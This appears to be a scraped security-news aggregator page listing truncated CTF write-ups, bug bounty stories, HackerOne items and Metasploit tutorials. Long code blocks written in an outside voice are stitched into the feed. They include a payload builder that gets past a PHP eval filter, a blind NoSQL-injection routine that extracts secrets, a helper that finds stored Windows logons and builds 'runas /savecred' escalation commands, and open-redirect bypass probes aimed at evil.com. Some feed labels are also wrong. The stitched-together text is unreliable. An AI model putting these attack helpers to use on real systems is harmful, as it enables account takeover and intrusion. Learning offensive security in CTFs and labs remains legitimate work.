Happy Hacking8

A clean information-feed tool, leaning toward the bits and pieces of the security community, surfacing quality content for security researchers every day.

Daily updates
Timeline
2021-07-31 18:40:14 Zedd's Blog
I recently summarised and organised what I know about the TLS Poison attack; this article continues with TLS Poison exploitation and its practical use in CTFs, and uses this challenge to cover FTPS-related knowledge as well.
The article was first published on Chaitin Security Classroom (长亭安全课堂): Practical exploitation of the TLS-Poison attack technique in a real CTF challenge https://mp.weixin.qq.com/s/ZziSf69AOyXoI0IgC0UyUQ
PS: before reading this article you are advised to have the relevant prior knowledge of TLS Poison; this article will not re-introduce the basics of the TLS Poison attack in detail.
Let us first revisit the Black Hat talk: why did the author call it "When TLS Hacks You" rather than "When HTTPS Hacks You"? It signals that the problem lies in properties of TLS itself, so the way we currently tend to focus narrowly on HTTPS is a rather limited view. Since HTTPS is just HTTP over TLS, can other protocols be used too, such as FTPS, i.e. FTP over TLS? So let's look at how FTPS can be used.
Introduction to FTPS
FTPS (also known as FTP-SSL and FTP Secure) is an extension to the commonly use
2021-07-31 18:40:14 Zedd's Blog
This is the second article in the "One Article to Understand XXX Attacks" series. It mainly covers the three attack methods that make up the TLS Poison attack, some DNS rebinding tricks that could arguably be called "new", and some notes on IP selection, among other things.
The article was first published on 雷神众测 (Thor Crowdtest) as a series:
One Article to Understand TLS Poison Attacks (1) https://mp.weixin.qq.com/s/tAba3-qb5YGtlzH7y6PFvg
One Article to Understand TLS Poison Attacks (2) https://mp.weixin.qq.com/s/aIWcpIXs-jQoMXuEppj3TQ
One Article to Understand TLS Poison Attacks (3) https://mp.weixin.qq.com/s/vBAeGaeBKnSyXUL_qmr7Gg
One Article to Understand TLS Poison Attacks (4) https://mp.weixin.qq.com/s/YdV9Hlpz38d09JOdtf2PxA
Preface
Using the title "One Article to Understand XXX Attacks" is a way of pushing myself to understand as many of an attack's details as thoroughly as possible, and also of improving my writing and expression. This article aims to help you learn about the TLS Poison attack, in the hope that a single article is enough to understand it,
2021-07-31 18:40:14 Zedd's Blog
More than two months have passed since the DEFCON 28 Final. I meant to write this right after it ended, but some odds and ends got in the way, so I'm catching up now with some thoughts on the competition.
Preface
Foreword: this article does not represent the views of any organisation or team; it reflects only my personal opinions and feelings. If anything here offends, please contact me and I will make the necessary changes.
Because of this year's pandemic, this year's DEFCON Final was held online. I had the honour of playing in the DEFCON 28 CTF Final with Tea Deliverers, and we finished fourth. I'll write this mainly from the angle of anecdotes from the competition plus some analysis of the Web challenges; since the Web challenges were overly simple there isn't much worth analysing, so there's little technical content here and it's best read as a story for a laugh. To avoid unnecessary trouble, wherever names or IDs come up I refer to people as "xx 师傅".
The First DEFCON Final In My Life
Simple Introduction
Here is a brief introduction to this year's format; for the details, see the official site: https://oooverflow.io
2021-07-31 18:40:14 Zedd's Blog
A few days ago PortSwigger published the Top 10 web hacking techniques of 2019. The techniques on the list are all quite interesting, and p牛 will surely share them in his 小密圈 (paid community) (and if not, I'll study and share them on my own blog), so we won't go over the Top 10 here; instead let's look at a technique that didn't make the Top 10 but is still very interesting: DOM Clobbering.
The article was first published on the 先知 (XZ) community: https://xz.aliyun.com/t/7329
Basics
From MDN Web Docs:
The Document Object Model (DOM) is a programming interface for HTML and XML documents. It represents the page so that programs can change the document structure, style, and content. The DOM represents the document as nodes and objects. That way, programming languages can connect to the page.
A Web page is a document. This document can be either displayed in the browser window or as the HTML source. But it is the same document in both cases. The Document Object Model (DOM) represents that same document so it can be manipulated. The DOM is an object-oriented represent
2021-07-31 18:40:14 Zedd's Blog
Sign-in-only players, please be self-aware. After several days of torment I've finally more or less worked through all of this competition's challenges, so here I record the solutions to the Web challenges.
The article was first published on the 先知 (XZ) community: https://xz.aliyun.com/t/7081
If you have better or more interesting solutions, feel free to share and discuss. Many thanks to @rebirth, @wonderkun, @wupco and others for patiently guiding me while I studied this competition's challenges.
File Magician
Difficulty estimate: easy
Solved:133/321
Points: round(1000 · min(1, 10 / (9 + [133 solves]))) = 70 points
Description:
Finally (again), a minimalistic, open-source file hosting solution.
Download:
file magician-3ace41f3b0282a70.tar.xz (2.1 KiB)
This counts as the sign-in challenge among the Web tasks: the Docker files and source code are given directly, so we can bring it up locally and experiment.
```php
<?php
error_reporting(0);
ini_set('display_errors', 0);
ini_set('display_startup_errors', 0);
se
// (the listing is cut off here in the source)
```
2021-07-31 18:40:14 Zedd's Blog
HTTP Desync Attacks came up at both DEF CON 27 and Black Hat this year. I had wanted to set aside time to study them a few months ago but never managed to, and recently I finally took the time to look properly.
The article was first published on the 先知 (XZ) community: https://xz.aliyun.com/t/6878
While I was researching this over the past few days, mengchen@知道创宇404实验室 (Knownsec 404 Lab) happened to publish "Protocol-layer attacks: HTTP request smuggling", which gave me further insight. That article is very well written and strongly recommended; here I combine it with my own understanding into one write-up, which can also be read as a supplement to, and a more detailed elaboration of, that article.
Because of my own time constraints the whole article dragged on for about two months from start to finish, with possibly long gaps in between, so there are probably quite a few mistakes; please point them out directly. Writing is not easy, so please bear with me. I have also been following security issues in this area; feel free to study and discuss together :) Contact: emVkZHl1Lmx1QGdtYWlsLmNvbQ==
If I come across new findings or summaries later I will also post them on my own
2021-07-31 18:40:14 Zedd's Blog
At this year's WCTF 2019, Tokyo Westerns set a challenge involving a side-channel attack on Windows Defender, and Tokyo Westerns CTF 2019 also had a related challenge, PHP Note. I found it quite interesting, but the online write-ups I read were all fairly sketchy, so I'm recording my own analysis here.
Windows Defender
As everyone knows, Windows Defender is the built-in security protection software on the Windows 10 platform,
the game pop-up killer
Windows Defender (renamed Windows Defender Antivirus in the Windows 10 Creators Update), formerly Microsoft AntiSpyware, was originally a program for removing, quarantining and preventing spyware; it can run on Windows XP and later and has been built into Windows Vista and later versions. Its definition database is updated very frequently. On Windows 8 and later it replaced Microsoft Security Essentials and became a full antivirus product.
Like some other free products of its kind, Windows Defender can not only scan the system but also monitor it in real time, removing already
2021-07-31 18:40:14 Zedd's Blog
This time I set three Web challenges for SUCTF: CheckIn, pythonginx and Upload Labs 2. Below I share some of the thinking and ideas behind them, along with some recent deeper digging into phar.
The article was first published on the 先知 (XZ) community: https://xz.aliyun.com/t/6057
CheckIn
The CheckIn challenge came from a note about .user.ini that I came across while reading the PHP documentation; I then referred to "PHP backdoors built from user.ini files". It is fairly old, and many upload tutorials, even upload-labs, which I consider a fairly comprehensive summary, never mention this trick; thinking back and searching roughly, I couldn't find a CTF that had used it either. But it is quite simple, and I guessed some people still didn't know it, so I put it in as web1, the sign-in challenge.
When setting it I took a challenge from the North-East regional of the national competition (国赛) and modified it; the original plan was to ban .htaccess outright, to save everyone time and keep them from going off on a tangent. In the end I made a typo and banned htacess instead… after which a crowd of 师傅
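As an added example (mine, not the author's challenge code), here is what a reviewer of an upload directory would check for. The trick rests on PHP reading a per-directory .user.ini under the CGI/FastCGI SAPIs, where an auto_prepend_file or auto_append_file directive makes PHP include an arbitrary file, such as an uploaded "image", into every script executed from that directory, so no .php extension is ever needed. The parser, the directive set and the sample file below are my assumptions for illustration.

```python
import re

# Directives PHP accepts in a per-directory .user.ini (honoured by the CGI/FastCGI
# SAPIs, i.e. typical php-fpm deployments) that pull another file into every PHP
# script run from that directory. A file named here is parsed as PHP regardless
# of its extension. (Assumption for this example; not the challenge's code.)
INCLUDE_DIRECTIVES = {"auto_prepend_file", "auto_append_file"}

_ASSIGNMENT = re.compile(r"^([A-Za-z_][A-Za-z0-9_.]*)\s*=\s*(.*)$")


def parse_user_ini(text: str) -> dict:
    """Parse the subset of php.ini syntax that matters here: key = value lines,
    ';' comments, optional quoting of values. Section headers are ignored.
    Keys are lower-cased so the detector errs on the side of flagging."""
    directives = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        m = _ASSIGNMENT.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        directives[key] = value
    return directives


def find_include_backdoors(text: str) -> list:
    """Return [(directive, target)] for every include-style directive with a value."""
    return [(k, v) for k, v in parse_user_ini(text).items()
            if k in INCLUDE_DIRECTIVES and v]


# Constructed sample: what an attacker would upload next to a renamed web shell.
SAMPLE_USER_INI = """\
; looks like a harmless upload tweak
upload_max_filesize = 2M
auto_prepend_file="avatar.jpg"
"""

if __name__ == "__main__":
    for directive, target in find_include_backdoors(SAMPLE_USER_INI):
        print(f"{directive} -> {target}")
```

On the defensive side, per-directory user INI files can be switched off entirely by setting user_ini.filename to an empty string in php.ini, and upload directories should not be served through PHP at all; an extension blocklist alone does not stop this.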
2021-07-31 18:40:14 Zedd's Blog
The article was first published on the 先知 (XZ) community: https://xz.aliyun.com/t/5677
At ISITDTU CTF 2019 I did a fairly interesting code-audit challenge that mainly relied on PHP XOR and similar operations to get a shell; I learned a lot from it. Lately I've grown to like this kind of thing more and more: simple code that hides a lot…
Description
Don't try to run any Linux command, just use all the PHP functions you know to get the flag
```php
<?php
highlight_file(__FILE__);

$_ = @$_GET['_'];
if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) )
die('rosé will not do it');

if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )
die('you are so close, omg');

eval($_);
?>
```

Write Up
Explanation
The challenge code is fairly simple. First look at the first regular expression: the character class blocks the control bytes \x00 to space and \x7F, the digits 0-9, the quotes ' " `, the characters $ & . , | [ { _ and, case-insensitively, the letters d e f g o p s; a single match kills the request.
Then the second filter: strtolower converts the string to lowercase, count_chars with mode 3 returns a string containing each byte value used exactly once, and the check is whether that string is longer than 13, i.e. whether the payload uses more than 13 distinct bytes.
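As an added example, not part of the original write-up, here are the two filters re-implemented in Python so a candidate payload can be checked offline, plus one way to build a call that satisfies both: bytes 0x80 to 0xFF are not in the blocklist, PHP accepts them in a bare identifier, and bitwise ~ maps them back to ASCII. The encoding helper and the phpinfo example are my illustration of the general idea, not the author's solution (the write-up is cut off above before it); the bare-constant-to-string behaviour it relies on is PHP 7's.

```python
import re
from typing import Tuple

# The two filters from the challenge, re-implemented over raw bytes so a candidate
# payload can be checked before it is sent (constructed for this page; the original
# runs them in PHP and then eval()s the input).
BLOCKLIST = re.compile(rb"[\x00- 0-9'\"`$&.,|\[{_defgops\x7F]+", re.IGNORECASE)
MAX_DISTINCT_BYTES = 0xD  # strlen(count_chars(strtolower($_), 3)) must not exceed 13


def passes_blocklist(payload: bytes) -> bool:
    """True when preg_match('/[...]+/i', $_) would find nothing."""
    return BLOCKLIST.search(payload) is None


def distinct_bytes(payload: bytes) -> int:
    """count_chars(..., 3) returns one copy of every byte value present; its length
    is the number of distinct bytes, after ASCII lower-casing."""
    return len(set(payload.lower()))


def check(payload: bytes) -> Tuple[bool, str]:
    """Mirror the PHP control flow: which die() message fires, or eval() is reached."""
    if not passes_blocklist(payload):
        return False, "rosé will not do it"
    if distinct_bytes(payload) > MAX_DISTINCT_BYTES:
        return False, "you are so close, omg"
    return True, "eval"


def not_encode(name: bytes) -> bytes:
    """Map an ASCII identifier to bytes >= 0x80 so that PHP's bitwise ~ recovers it.
    Those bytes are neither blocked nor digits, and PHP 7 treats a bare identifier
    made of them as an undefined constant that evaluates to its own name (a string),
    silently, given error_reporting(0). (My illustration, not the author's payload.)"""
    return bytes(b ^ 0xFF for b in name)


def call_without_quotes(func: bytes) -> bytes:
    """(~<encoded>)();  -- a function call that uses no quotes, digits or $."""
    return b"(~" + not_encode(func) + b")();"


if __name__ == "__main__":
    for p in (b"phpinfo();", call_without_quotes(b"phpinfo")):
        print(p, check(p), distinct_bytes(p))
```

The distinct-byte budget is the real constraint: every different letter in the target name costs one byte, so long names have to be assembled from short ones or via functions whose names reuse letters.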
Doing
Step 1
Since the regex imposes so many constraints, naturally we first have to
2021-07-31 18:40:12 wonderkun's blog
2021-07-31 18:39:57 Hackerman's Hacking Tutorials
A few days ago I saw a tweet about thick client vulnerabilities. I am not linking to it because it appeared to be from someone new to the industry and very excited.
The Original Tweet
Well, most of these are not vulnerabilities. So, I am compiling my tweets into a blog post.
It's important that we only go after actual vulnerabilities and not spread misinformation.
Funnily, I have talked about several of these in a separate blog post named No, You Are Not Getting a CVE for That
2021-07-31 18:39:49 Sploitus.com Exploits RSS Feed
2021-07-31 18:39:49 Security Boulevard
Did you know that, according to recent research by a well-known Japanese security firm, computer systems in Japan are being attacked by destructive wiper malware? Shockingly, this was discovered 2 days before the opening ceremony of the Tokyo Olympics 2021. What is wiper malware? Wiper […]
The post Wiper Malware Threat Looms Over Tokyo Olympics appeared first on Kratikal Blogs.
2021-07-31 18:39:49 Security Boulevard
The appeal of cloud services makes it all the more important for these providers to understand how GDPR obligations affect their business.
The post GDPR: What Cloud Service Providers Should Know appeared first on Security Boulevard.
2021-07-31 18:39:29 bunnie's blog
The Ware for July 2021 is shown below. For well over a year now, I haven't traveled much further than 10km from where I sit and write this. However, sometimes the world brings you interesting things. This ware has a little bit of a story behind it; it arrived, and of course I popped off […]
2021-07-31 18:39:29 bunnie's blog
The Ware for June 2021 is an Amplifier Research AR200L 200W linear power amp. This is the last (for now at least) of the very fine set of wares that Don Straney had contributed. Thanks, Don! They helped get me through the pandemic, until I can travel the world again and stumble across new wares. […]
2021-07-31 18:26:46 HackerOne newly disclosed reports
Affected vendor: Rocket.Chat Bounty: (not listed) Severity: high
Post-auth blind NoSQL injection in the Users.list API leads to remote code execution
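As an added generic illustration of the bug class in this report's title (my code; not Rocket.Chat's implementation and not the reported bug itself), this is the shape of a blind NoSQL injection where a caller-supplied filter object reaches the database unchecked: even though only usernames are returned, a $regex condition on a hidden field leaks that field one character per request through whether a row comes back. The in-memory collection and the tiny operator emulation stand in for MongoDB so the example runs offline.

```python
import re
import string

# Constructed in-memory "users" collection standing in for the database.
USERS = [
    {"username": "alice", "secret": "s3cr3t-Token-42"},
    {"username": "bob", "secret": "hunter2"},
]


def mongo_like_match(doc: dict, query: dict) -> bool:
    """Emulate the two filter forms we need: equality on scalars and
    {"$regex": pattern} on string fields (a deliberately tiny subset)."""
    for field, cond in query.items():
        value = doc.get(field)
        if isinstance(cond, dict):
            if set(cond) != {"$regex"}:
                raise ValueError(f"unsupported operator in {cond}")
            if not isinstance(value, str) or re.search(cond["$regex"], value) is None:
                return False
        elif value != cond:
            return False
    return True


def users_list_vulnerable(query: dict) -> list:
    """The injection point: a caller-controlled JSON object is used as the filter.
    Only usernames are returned, but *whether* a row comes back leaks the secret."""
    return [{"username": d["username"]} for d in USERS if mongo_like_match(d, query)]


def users_list_fixed(query: dict) -> list:
    """Hardened: allow-listed fields and scalar strings only, so no operator objects."""
    for field, cond in query.items():
        if field not in {"username"} or not isinstance(cond, str):
            raise ValueError("invalid query")
    return users_list_vulnerable(query)


def query_is_rejected(query: dict) -> bool:
    """Convenience for checking the hardened endpoint's behaviour."""
    try:
        users_list_fixed(query)
    except ValueError:
        return True
    return False


def extract_secret(username: str,
                   alphabet: str = string.ascii_letters + string.digits + "-",
                   max_len: int = 64) -> str:
    """Blind extraction against the vulnerable endpoint: each probe asks 'does the
    secret start with <known>+<ch>?' and reads the answer from the result count."""
    known = ""
    while len(known) < max_len:
        for ch in alphabet:
            probe = {"username": username,
                     "secret": {"$regex": "^" + re.escape(known + ch)}}
            if users_list_vulnerable(probe):
                known += ch
                break
        else:
            break  # no extension matched: the full value has been recovered
    return known


if __name__ == "__main__":
    print(extract_secret("alice"))
```

The fix is not escaping: it is refusing to let the request body choose operators at all, by validating types (a string where a string is expected) before anything is passed to the query layer.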
2021-07-31 17:07:26 T00ls forum
2021-07-31 16:47:25 T00ls forum
2021-07-31 16:27:32 Pediy forum (看雪论坛)
This week, Foxit released security updates for its PDF Reader and Editor to address multiple vulnerabilities, including remote code execution.
2021-07-31 16:26:21 CVE monitor for well-known components
A new vulnerable component was found; component ID: Sangfor (深信服)
2021-07-31 16:26:20 CVE monitor for well-known components
A new vulnerable component was found; component ID: Hikvision (海康威视)
2021-07-31 16:07:27 T00ls forum
2021-07-31 15:07:58 From FreeBuf
About Aggrokatz: Aggrokatz is a Cobalt Strike aggressor extension that lets pypykatz be used remotely against a Beacon…
2021-07-31 13:07:36 From FreeBuf
This article starts from an overview of Chromium's architecture and security mechanisms, analyses the security risks that Chromium components expose enterprises to in various scenarios, and looks at ways to contain them.
2021-07-31 13:07:17 T00ls forum
2021-07-31 12:07:44 From FreeBuf
Beijing Congyun Technology Co., Ltd. (Congyun Technology), founded in October 2018, is a provider of zero-trust-based data security product solutions.
2021-07-31 10:47:38 From FreeBuf
Misconfigured permissions on Argo's web-facing dashboard allow unauthenticated attackers to run code on Kubernetes targets, including crypto-mining containers.
2021-07-31 10:26:37 HackerOne newly disclosed reports
Affected vendor: Snapchat Bounty: 1000.0 USD Severity: medium
Bitmoji source code is accessible
2021-07-31 10:07:33 From FreeBuf
This is the second article in an Android study series.
2021-07-31 10:07:28 360 Anquanke (360安全客)
In a real engagement I came across a case like this: a login form that 302-redirects to the admin page when the password is correct had a blind injection, but the login data was encrypted, so sqlmap could not be used to automate the injection. So I wanted to write a Python script to automate the process.
2021-07-31 08:44:10 Software Integrity Blog
In this episode of AppSec Decoded, we discuss the impact of the new executive order by the Biden administration on organizations working with the government.
The post AppSec Decoded: New executive order changes dynamic of software security standards appeared first on Software Integrity Blog.
2021-07-31 08:44:10 Software Integrity Blog
Addressing security fatigue with small changes to your AppSec strategy can help you manage and minimize risks in your applications.
The post How to cyber security: Addressing security fatigue appeared first on Software Integrity Blog.
2021-07-31 08:44:06 HackerOne Hacker Activity
Date: 2021-07-30 20:07 UTC
OS: FreeBSD 12.2-RELEASE-p5
PHP Version: 7.3.29
Package: Scripting Engine problem
Title: Segmentation fault
2021-07-31 08:44:06 HackerOne Hacker Activity
Date: 2021-07-30 18:00 UTC
OS: Windows 10 21H1
PHP Version: 8.0.9
Package: GD related
Title: imagefilledellipse - draws strange shape in large size
2021-07-31 08:44:06 HackerOne Hacker Activity
Date: 2021-07-30 03:18 UTC
OS: ubuntu
PHP Version: 7.4.22
Package: mbstring related
Title: mb_convert_variables() corrupts reference of array element
2021-07-31 08:44:06 HackerOne Hacker Activity
Date: 2021-07-29 19:30 UTC
OS: Windows + Linux
PHP Version: 8.0.9
Package: JIT
Title: Segfault running test suite with JIT enabled
2021-07-31 08:44:06 HackerOne Hacker Activity
Date: 2021-07-29 17:13 UTC
OS: Ubuntu-latest
PHP Version: Irrelevant
Package: solr
Title: Unable to compile because of curl directory structure
2021-07-31 08:44:02 Bug Bounty in InfoSec Write-up
A write-up about a client-side DoS on Keep that allowed me to block any user from accessing their Keep notes
Continue reading on InfoSec Write-ups »
2021-07-31 08:44:02 Bug Bounty in InfoSec Write-up
Hello everyone, today I will be talking about one of the critical bugs I found in Oracle Corporation. Now, let's start with the recon process
Step 1:
1) There are multiple tools with which you can get subdomains; a few of them are given below…
i) Findomain
ii) Subfinder
iii) knock.py
2) To get the live hosts from the subdomain list, we can use tools such as
i) httprobe
ii) httpx
Now I prefer to use findomain to get my results quickly. So the command would look something like this….
Command: findomain -t oracle.com | httpx -title -status-code | tee oracle.txt
Step 2:
You need to gather some more endpoints to find P1 bugs, and for that you can use Waybackurls and Gau.
Step 3:
Now, I was looking for admin portals to get unauthenticated access, and for that I searched for some endpoints.
Endpoints:
i) dev.
ii) stag.
iii) admin.
iv) internal.
v) stag-dev.
vi) stag-admin.
vii) internal-dev.
viii) _dev.
There are more endpoints that you can find out by opening the URLs one by one from waybackurls, gau, and the
2021-07-31 08:44:02 Bug Bounty in InfoSec Write-up
An estimated $712.4 billion was lost to banking fraud in 2020, with nearly 75% of it being internal and identity theft.
Continue reading on InfoSec Write-ups »
2021-07-31 08:44:02 Bug Bounty in InfoSec Write-up
I'm going to solve another room called "Yearofthejellyfish". It's available at TryHackMe with a Hard difficulty level.
#yearofthejellyfish
The first thing we want to do is add the deployed machine's IP and hostname to /etc/hosts:
/etc/hosts
Let's do a port scan:
nmap result
There are a few open ports.
Let's start with what looks to be a website on port 443. Going to the website we're first presented with a warning: a self-signed certificate is in use for this site. Click View Certificate to have a look:
certificate
This reveals that the certificate has three additional Subject Alternative Names.
Let's add them to our hosts file:
/etc/hosts
Continuing on to the site we see a single static page:
Looking at dev.robyns-petshop.thm and beta.robyns-petshop.thm, there is nothing noteworthy. Now let's look at the monitorr.robyns-petshop.thm subdomain:
monitorr
According to the GitHub page, Monitorr is a web front-end that live-displays the status of any web app or service.
I notice a version number at the bottom of t
2021-07-31 08:44:02 Bug Bounty in InfoSec Write-up
Hello, it's me, Bikram Kharal from Nepal. I am an infosec learner and engineering student.
Today I will be writing about a bug that I recently found on a Vulnerability Disclosure Program, so in this blog I will be calling it redacted.com. I was scrolling Twitter while my online class was running and someone was suggesting hunting on that redacted site. So much for my studies
Now I started testing on that site.
As normal, I registered on the site and started understanding how the website worked. After registration it asked me to verify my email using a 6-digit code. So I tried to brute-force the endpoint, but there was rate limiting.
After one hour of testing I realised that it was IP-based rate limiting, so I bypassed that using the IP Rotate extension in Burp Suite. Then I quickly reported that bug. lol
After one day I got a reply from them that it was a duplicate. :(
I was still searching for other bugs on the same program. Again I registered at the site wit
2021-07-31 08:44:02 Bug Bounty in InfoSec Write-up
Something is better than nothing, even if it is less than one wanted.
Continue reading on InfoSec Write-ups »
2021-07-31 08:44:02 Bug Bounty in InfoSec Write-up
A buffer is a region of physical storage memory used to hold data temporarily while it is moved from one place to another. These buffers usually reside in RAM. Computers often use buffers to improve performance: most modern hard drives use buffering to access data efficiently, and many online application services use buffers too. For example, buffers are commonly used during online video streaming to smooth over interruptions: the video player downloads a portion of the video ahead of playback (the author gives 20% as an example) into a buffer and then streams from that buffer, so a small drop in connection speed or a brief service interruption does not affect playback.
However, a buffer has a fixed capacity: it holds a limited amount of data for a limited time, and many applications rely on this mechanism. When more data is pushed into a buffer than it can hold, the condition is called a buffer overflow. It is a flaw that arises wh
2021-07-31 08:44:02 Bug Bounty in InfoSec Write-up
A method to escalate your privileges without knowing any password.
Hi guys!
Recently I took a course on Windows privilege escalation, and today I want to show you a very cool method that you can use to escalate your privileges without knowing the password of the user account.
Let's start!
Windows Credential Manager
First, if you don't know what Windows Credential Manager is, it's simply a password manager pre-installed in Windows where you can save credentials for both user accounts and websites.
Basically you can save your passwords in four different sections:
Windows credentials, which are used by Windows.
Certificate-based credentials, which as the name says use certificates; they are quite rarely used.
Generic credentials.
Web credentials, used for saving logins for websites.
Now let's see how we can save our credentials.
Open the search bar and type Credential Manager.
Now let's try to add a new credential.
We can confirm that the credential has been saved by running the command below.
cmdkey /list
Note: cmdk
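As an added example (mine, not the article's), the enumeration step turned into code: parsing cmdkey /list output into records and picking out the stored interactive Windows logons, which are the entries a password-less escalation relies on. The sample output below is constructed, and the runas /savecred invocation at the end is my assumption about where the cut-off article is heading rather than something the page states.

```python
# Constructed sample of `cmdkey /list` output, in the layout the tool prints;
# the target and user names are made up for this example.
SAMPLE_CMDKEY_LIST = """\
Currently stored credentials:

    Target: Domain:interactive=WORKSTATION\\Administrator
    Type: Domain Password
    User: WORKSTATION\\Administrator

    Target: LegacyGeneric:target=TERMSRV/fileserver
    Type: Generic
    User: CORP\\alice
    Local machine persistence
"""


def parse_cmdkey_list(text: str) -> list:
    """Turn the indented Target/Type/User blocks into dicts, one per credential."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Target:"):
            current = {"target": line[len("Target:"):].strip(),
                       "type": "", "user": "", "persistence": ""}
            entries.append(current)
        elif current is None:
            continue  # header text before the first block
        elif line.startswith("Type:"):
            current["type"] = line[len("Type:"):].strip()
        elif line.startswith("User:"):
            current["user"] = line[len("User:"):].strip()
        elif line.endswith("persistence"):
            current["persistence"] = line
    return entries


def saved_logons(entries: list) -> list:
    """Entries of type 'Domain Password' with an interactive target: stored Windows
    logons, i.e. the ones that can start a process as that user without its password."""
    return [e for e in entries
            if e["type"] == "Domain Password"
            and e["target"].startswith("Domain:interactive=")]


def runas_command(entry: dict, program: str = "cmd.exe") -> str:
    """The runas invocation that consumes such a stored credential
    (assumption: the standard /savecred switch; not stated on the page)."""
    return f'runas /savecred /user:{entry["user"]} "{program}"'


def sample_entries() -> list:
    return parse_cmdkey_list(SAMPLE_CMDKEY_LIST)


if __name__ == "__main__":
    for entry in saved_logons(sample_entries()):
        print(entry["user"], "->", runas_command(entry))
```

On a real host the input would come from running cmdkey /list in the low-privileged session; the Generic entry in the sample is deliberately left out of the result, since it is not a logon credential.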
2021-07-31 08:44:02 Bug Bounty in InfoSec Write-up
Hi there,
Renganathan here.
This write-up is about a vulnerability that I found on Medium which allowed me to hack your Medium account by phishing your FB, Twitter & Google credentials.
Medium Login
YES :P
A few months ago I saw Pratik Dabhi listed in the Medium hall of fame, so I was motivated to hunt bugs on Medium. I enumerated the subdomains and stopped there, because my methodology in those early days was very outdated and I was not good at recon.
So I thought of giving it another try.
I started by collecting interesting parameters with Waybackurls, ParamSpider & Gau; at the same time I was manually exploring the site and also spidering Medium with Burp Suite.
Burp Suite spidering
Then after some time I was searching for open redirection parameters like the ones below.
?next=
?url=
?target=
?rurl=
?dest=
?destination=
?redir=
redirect_uri=
?redirect_url=
?redirect=
/redirect/
cgi-bin/redirect.cgi?{}
/out/
/out?
?view=
/login?to=
?image_url=
?go=
?return=
?returnTo=
?return_to=
?check
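What those parameters are being probed for, as an added example that is not part of the write-up and not Medium's code: the weak check many applications put behind a next= or redirect_url= parameter, beside a version that survives the standard bypasses (scheme-relative //, backslash, embedded whitespace, userinfo@ tricks). The allowed host is an assumption.

```python
from urllib.parse import urlsplit

ALLOWED_HOST = "example.com"  # assumption: the application's own host


def is_safe_redirect_naive(target: str) -> bool:
    """Common (broken) check: 'relative paths start with a slash'."""
    return target.startswith("/")


def is_safe_redirect(target: str, allowed_host: str = ALLOWED_HOST) -> bool:
    """Accept only targets that stay on the application's own origin."""
    # Browsers strip tabs/newlines and treat backslash as a slash; refuse both.
    if any(ch.isspace() or ord(ch) < 0x20 or ch == "\\" for ch in target):
        return False
    if target.startswith("//"):
        return False  # scheme-relative: //evil.com is cross-origin
    try:
        parts = urlsplit(target)
    except ValueError:
        return False
    if parts.scheme == "" and parts.netloc == "":
        return True  # plain path, query or fragment on the current origin
    if parts.scheme.lower() not in ("http", "https"):
        return False  # javascript:, data:, and anything else
    # .hostname drops userinfo (user@) and the port and lower-cases the host,
    # so https://example.com@evil.com/ compares as evil.com.
    return parts.hostname == allowed_host


# Constructed probes of the kind sent to each parameter in the list above.
PROBES = ["//evil.com", "/\\evil.com", "/\t/evil.com",
          "https://example.com@evil.com/", "https://example.com.evil.com/",
          "javascript:alert(1)", "/account/settings"]


def naive_bypasses(probes: list = PROBES) -> list:
    """Probes the naive check lets through that the strict one rejects."""
    return [p for p in probes if is_safe_redirect_naive(p) and not is_safe_redirect(p)]


if __name__ == "__main__":
    print(naive_bypasses())
```

Rejecting anything the parser finds odd is the right default here: a redirect parameter only ever needs to name a path on the same site, so the strict function can afford to be conservative.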
2021-07-31 08:43:59 Hacking Articles
This is a continuation of the Metasploit for Pentester series of articles we are presenting. More specifically, we learned about workspaces and the Metasploit database service in this article: Metasploit for Pentester: Database & Workspace. In this article, we will be discussing another database inside the workspace that
The post Metasploit for Pentester: Creds appeared first on Hacking Articles.
2021-07-31 08:43:59 Hacking Articles
In this article, we are going to cover the tactics of hidden bind TCP shellcode. Every organization has multiple scanning tools to scan its network and identify new or unidentified open ports. In this type of environment, it is very difficult to hide suspicious bind shellcode and remain
The post Metasploit for Pentester: Windows Hidden Bind Shell appeared first on Hacking Articles.
2021-07-31 08:43:59 Hacking Articles
Continuing this series of articles dedicated to the Metasploit Framework, intended as a resource for penetration testers so that they can use the variety of features present in the Metasploit Framework to the fullest extent. In this article, we will be talking about the migrate
The post Metasploit for Pentester: Migrate appeared first on Hacking Articles.
2021-07-31 08:43:59 Hacking Articles
Socat is one of those tools that either you don't know at all, or, if you do, you know all the different things you can do with it. While working with it, we felt that there are guides for socat but none
The post Socat for Pentester appeared first on Hacking Articles.
2021-07-31 08:43:59 Hacking Articles
Staying hidden and undetectable is the priority after anonymity. In this article, we are going to learn how to create an innocuous-looking backdoor and bind it to a legitimate executable file to gain the victim's trust. Table of Contents Pre-requisites for lab setup Executable file search on victim's PC
The post Metasploit for Pentester: Inject Payload into Executable appeared first on Hacking Articles.